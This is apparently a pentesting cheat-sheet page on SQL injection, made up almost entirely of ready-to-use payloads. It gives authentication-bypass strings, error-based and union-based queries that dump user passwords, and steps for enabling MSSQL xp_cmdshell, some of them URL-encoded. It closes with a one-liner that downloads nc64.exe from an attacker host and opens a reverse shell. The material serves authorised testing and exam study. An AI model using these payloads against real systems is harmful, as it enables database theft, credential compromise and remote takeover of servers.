SQLi

SQLi Authentication bypass

<username>' OR 1=1--
'OR '' = '
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--

1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1

Authenticated SQLi (Refer here)

MYSQL

SELECT version();
SELECT system_user();
show databases;

SHOW TABLES FROM database_name;
OR
use <db_name>
show tables;
describe users; # describes columns in users' table

SELECT * from <test>.<users>; # here test is DB and the user is a table in test db
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';bash

MSSQL

SELECT @@version;
SELECT name FROM sys.databases; # master, tempdb, model and msdb are default
SELECT * FROM offsec.information_schema.tables; # Returns table for offsec db
'''
offsec
dbo
users
'''
SELECT * from testuser.dbo.users; # We select dbo table schema between the db and table name
admin lab # user # pass
guest guest  # user # pass

Error based SQLi

tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- // # password for admin user

Union-based SQLi

*** injected UNION query has to include the same number of columns in the original query
*** Data types need to be compatible between each column

1) Finding the number of Columns
' ORDER BY 1-- // # Keep incrementing value of 1 to find columns

2) Finding name, user, and version
%' UNION SELECT database(), user(), @@version, null, null -- // # %' is used for closing the search parameter 
# Assume we got 5 columns on step 1, we are using 3 columns and leaving 2 as null here

2.1) Finding name, user, and version
# Sometimes column 1 is reserved for the ID field so no proper value comes and we try this instead
' UNION SELECT null, null, database(), user(), @@version  -- //

3) Enumerating table names, column names, and db_name
' UNION SELECT null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
# 1 and 5 are kept null
# we see a table called users, let's dive into that

4) Enumrating few columns from the user table found above
' UNION SELECT null, username, password, description, null FROM users -- //

Manual Code Execution

Template

EXEC sp_configure "show advanced options", 1;
RECONFIGURE;
EXEC sp_configure "xp_cmdshell", 1;
RECONFIGURE;

EXEC xp_cmdshell '<command>';

Examples

'; EXEC sp_configure 'show advanced options', 1; -- //
'; RECONFIGURE; -- //
'; EXEC sp_configure 'xp_cmdshell', 1; -- //
'; RECONFIGURE; -- //

Encoded:
%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20RECONFIGURE%3B%20--%20%2F%2F
%27%3B%20EXEC%20sp_configure%20%22xp_cmdshell%22%2C%201%3B%20--%20%2F%2F
%27%3B%20RECONFIGURE%3B%20--%20%2F%2F

'; EXEC xp_cmdshell '<command>'; -- //

'; EXEC xp_cmdshell 'whoami'; -- //
'; EXEC xp_cmdshell 'whoami /priv'; -- //
'; EXEC xp_cmdshell 'dir C:\Users'; -- //

'; EXEC xp_cmdshell 'ping 192.168.45.165'; -- //

Encoded:
%27%3B%20EXECUTE%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%20%2Fpriv%22%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22dir%20C%3A%5CUsers%22%3B%20--%20%2F%2F

%27%3B%20EXEC%20xp_cmdshell%20%22ping%20192.168.45.165%22%3B%20--%20%2F%2F

One Liner Example

Reverse Shell with nc
    '; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://192.168.45.165/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe 192.168.45.165 443 -e cmd.exe"; -- //
    
Assuming theres additional commands to run
    '; EXEC xp_cmdshell "<command>"; -- //

PreviousLFI/RFI NextPwnKit

Last updated 10 months ago